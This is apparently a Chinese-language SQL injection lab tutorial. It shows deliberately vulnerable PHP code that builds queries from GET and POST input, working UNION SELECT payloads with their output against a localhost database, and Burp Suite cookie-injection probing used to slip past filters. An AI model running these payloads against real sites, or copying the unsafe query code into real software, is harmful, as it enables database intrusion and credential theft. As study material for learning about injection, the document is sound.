一、参数类型注入
(思路:闭合检测符号即从做至右第二次出现的符号可闭合第一次出现的符号)
字符,数字,搜索型
搜索注入一般产生在搜索栏
区别注入原因:sql语句组合中,符号的问题
select * from user where id=4 //数字型注入sql语句
select * from user where username=’fanke’ //字符型注入sql语句
select * from user where password like '%$pass%' order by password;
字符:
<? //$id = $_GET['x']; $user = $_GET['u']; $conn = mysql_connect('127.0.0.1','root','root'); mysql_select_db('fanke',$conn); //$sql = "select * from user where id=$id"; $sql = "select * from user where username='$user'"; $result = mysql_query($sql); while($row = mysql_fetch_array($result)){ echo "用户ID: ".$row['id']."<br>"; echo "用户名: ".$row['username']."<br>"; echo "用户密码: ".$row['password']."<br>"; } mysql_close($conn); echo "<hr>"; echo "你当前执行的sql语句为: "; echo $sql;
http://127.0.0.1/php.php?u=fanke
用户ID: 4
用户名: fanke
用户密码: fanke
你当前执行的sql语句为: select * from user where username='fanke'
http://127.0.0.1/php.php?u=fanke order by 5
你当前执行的sql语句为: select * from user where username='fanke order by 5'
http://127.0.0.1/php.php?u=fanke' UNION SELECT 1,2,3,4,5'
用户ID: 4
用户名: fanke
用户密码: fanke
用户ID: 1
用户名: 2
用户密码: 3
你 当前执行的sql语句为: select * from user where username='fanke' UNION SELECT 1,2,3,4,5''
http://127.0.0.1/php.php?u=fanke' UNION SELECT 1,2,3,4,5,6'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\WWW\php.php on line 11
你当前执行的sql语句为: select * from user where username='fanke' UNION SELECT 1,2,3,4,5,6''
http://127.0.0.1/php.php?u=fanke' UNION SELECT user(),database(),@@version_compile_os,4,5'
用户ID: 4
用户名: fanke
用户密码: fanke
用户ID: root@localhost
用户名: fanke
用户密码: Win32
你当前执行的sql语句为: select * from user where username='fanke' UNION SELECT user(),database(),@@version_compile_os,4,5''
搜索型
<? $name=$_GET['n']; $pass=$_GET['p']; $conn=mysql_connect("127.0.0.1","root","123456");//连接mysql数据库 if($conn){ echo "ok!"; }//判断连接是否成功 mysql_select_db('fanke',$conn);//选择连接请求为conn的数据库(fanke) //$sql="select * from user where username='$name'"; //字符型搜索语句 $sql1="select * from user where password like '%$pass%' order by password";//搜索型注入sql语句 //$result=mysql_query($sql); $result1=mysql_query($sql1); /*while($row = mysql_fetch_array($result)){ echo "用户ID:".$row['id']."<br >"; echo "用户名:".$row['username']."<br >"; echo "用户密码:".$row['password']."<br >"; echo "用户邮箱:".$row['email']."<br >"; }*/ while($row = mysql_fetch_array($result1)){ echo "用户ID:".$row['id']."<br >"; echo "用户名:".$row['username']."<br >"; echo "用户密码:".$row['password']."<br >"; echo "用户邮箱:".$row['email']."<br >"; } mysql_close($conn); //关闭数据库连接 echo "<hr>"; echo "你当前执行的sql语句为:"; //echo "select * from user where username='$name'"; echo $sql1; ?>
http://127.0.0.1/php.php?p=f
用户ID: 6
用户名: fanke4
用户密码: fank
用户ID: 4
用户名: fanke
用户密码: fanke
用户ID: 5
用户名: fanke2
用户密码: fanke
你当前执行的sql语句为: select * from user where password like '%f%' order by password
http://127.0.0.1/php.php?p=f%' UNION SELECT 1,2,3,4,5'
用户ID: 1
用户名: 2
用户密码: 3
用户ID: 6
用户名: fanke4
用户密码: fank
用 户ID: 4
用户名: fanke
用户密码: fanke
用户ID: 5
用户名: fanke2
用户密码: fanke
你当前执行的sql语句为: select * from user where password like '%f%' UNION SELECT 1,2,3,4,5'%' order by password
二、提交方式注入
GET(一般),POST(表单),COOKIE(包含GET和POST)绕过URL检测
get是从服务器上获取数据,post是向服务器传送数据
cookie盗取 session劫持区别(用户凭据):cookie用于保存账号和密码,还可以通过cookie注入突破简单的防注入(第三方防注入程序一般只过滤get post的参数)
Cookie存储方式:本地端,存活时间可长可短,安全性低,对客户端性能有影响(缓存)
Session存储方式:服务端,存活时间一般较短,安全性高,但是客户请求次数频繁则对服务器性能有所影响(连接的建立与断开耗CPU、内存等)
<?php $name=$_POST['u']; $pass=$_POST['p']; $conn = mysql_connect('127.0.0.1','root','root'); if($conn){ echo "mysql连接成功"; echo "<hr>"; } mysql_select_db('fanke',$conn); $sql="select * from user where username='$name' and password='$pass'"; $result=mysql_query($sql); while($row = mysql_fetch_array($result)){ echo "用户ID:".$row['id']."<br >"; echo "用户名:".$row['username']."<br >"; echo "用户密码:".$row['password']."<br >"; } echo "当前执行的sql语句:".$sql; mysql_close($conn); ?>
密码: 'UNION SELECT user(),database(),@@version_compile_os,4,5'
http://127.0.0.1:81/1/1/shownews.asp?id=27
GET /1/1/shownews.asp?id=27 HTTP/1.1
Host: 127.0.0.1:81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU
VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU; id=27 and 1=1
Content-Length: 21900
Cookie: VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU; id=27 and 1=2
Content-Length: 7133
结论:正确与错误sql语句的Content-Length不同说明可能存在注入;正确sql语句的Content-Length是21900
Cookie: VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU; id=27 order by 11
Content-Length: 21900
结论:
流程:打开burpsuite开关,浏览器发出请求,burpsuite拦截这个数据包,forward放出一个数据包后并拦截下一个请求数据包
浏览器经抓包工具拦截下来修改后的数据包发出去后,浏览器会收到response;
浏览器拦截的数据包发到repeater可在左侧对其进行修改,并在repeater右侧收到responce